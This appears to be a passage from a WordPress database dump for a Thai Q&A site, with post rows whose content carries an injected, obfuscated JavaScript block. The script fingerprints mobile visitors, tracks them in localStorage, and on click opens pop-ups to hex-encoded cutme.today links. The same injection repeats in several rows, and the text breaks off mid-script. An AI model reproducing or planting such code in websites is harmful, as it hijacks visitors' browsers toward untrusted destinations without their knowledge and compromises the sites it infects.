_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','#Replay - หยุดครับ by admin','','publish','','closed','','replay-%e0%b8%ab%e0%b8%a2%e0%b8%b8%e0%b8%94%e0%b8%84%e0%b8%a3%e0%b8%b1%e0%b8%9a-by-admin','','','2024-08-01 10:36:00','2024-08-01 03:36:00','',0,'http://pakhaeng.ssk.in.th/?answer=replay-%e0%b8%ab%e0%b8%a2%e0%b8%b8%e0%b8%94%e0%b8%84%e0%b8%a3%e0%b8%b1%e0%b8%9a-by-admin',0,'answer','',0),
(349,1,'2024-08-01 10:59:12','2024-08-01 03:59:12','<!-- wp:shortcode -->\n[question_archive]\n<!-- /wp:shortcode -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กระทู้ ถาม-ตอบ ทั้งหมด','','publish','closed','closed','','%e0%b8%81%e0%b8%a3%e0%b8%b0%e0%b8%97%e0%b8%b9%e0%b9%89-%e0%b8%96%e0%b8%b2%e0%b8%a1-%e0%b8%95%e0%b8%ad%e0%b8%9a-%e0%b8%97%e0%b8%b1%e0%b9%89%e0%b8%87%e0%b8%ab%e0%b8%a1%e0%b8%94-2','','','2024-08-01 10:59:14','2024-08-01 03:59:14','',0,'http://pakhaeng.ssk.in.th/?page_id=349',0,'page','',0),
(350,1,'2024-08-01 10:59:12','2024-08-01 03:59:12','<!-- wp:shortcode -->\n[question_archive]\n<!-- /wp:shortcode -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return 